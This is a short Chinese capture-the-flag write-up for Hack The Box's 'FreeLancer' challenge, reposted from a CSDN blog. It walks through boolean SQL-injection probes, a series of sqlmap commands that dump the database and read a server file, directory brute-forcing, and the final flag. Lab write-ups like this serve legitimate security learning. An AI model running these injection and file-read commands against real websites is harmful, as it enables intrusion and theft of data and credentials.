标签:Box sqlmap http 88.216 FreeLancer sql 32583 php 167.99
0x00前言
忙着学习的我,继续肝下一题
提示:
Can you test how secure my website is? Prove me wrong and capture the flag!(您可以测试我的网站的安全性吗?证明我错了,并抓住了旗子!)
0x01访问网站
首先找攻击点
0x02 攻击点
打开源码从注释中找到攻击点
<!-- <a href="portfolio.php?id=1">Portfolio 1</a> -->
看见这个瞬间想到sql注入
首先常规判断注入
and 1=1
and 1=2
和上面对比显然出错,接下来使用神器sqlmap进行注入
python3 sqlmap.py -u "http://167.99.88.216:32583/portfolio.php?id=1" -v 3
python3 sqlmap.py -u "http://167.99.88.216:32583/portfolio.php?id=1" -v 3 -dbs
python3 sqlmap.py -u "http://167.99.88.216:32583/portfolio.php?id=1" -v 3 -D freelancer --tables
python3 sqlmap.py -u "http://167.99.88.216:32583/portfolio.php?id=1" -v 3 -T safeadmin -dump
看见这密码,以为成功了,试遍好多解码网站都解不开
使用dirsearch进行目录爆破找到路径
最后使用路径尝试读文件
python3 sqlmap.py -u "http://167.99.88.216:32583/portfolio.php?id=1" --file-read=/var/www/html/administrat/panel.php
最后打开文件找到flag
flag:HTB{s4ff_3_1_w33b_fr4__l33nc_3}
0x04 总结
尽可能多使用信息收集工具,不然目录都找不到
标签:Box,sqlmap,http,88.216,FreeLancer,sql,32583,php,167.99 来源: https://blog.csdn.net/yutao598/article/details/112993784
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。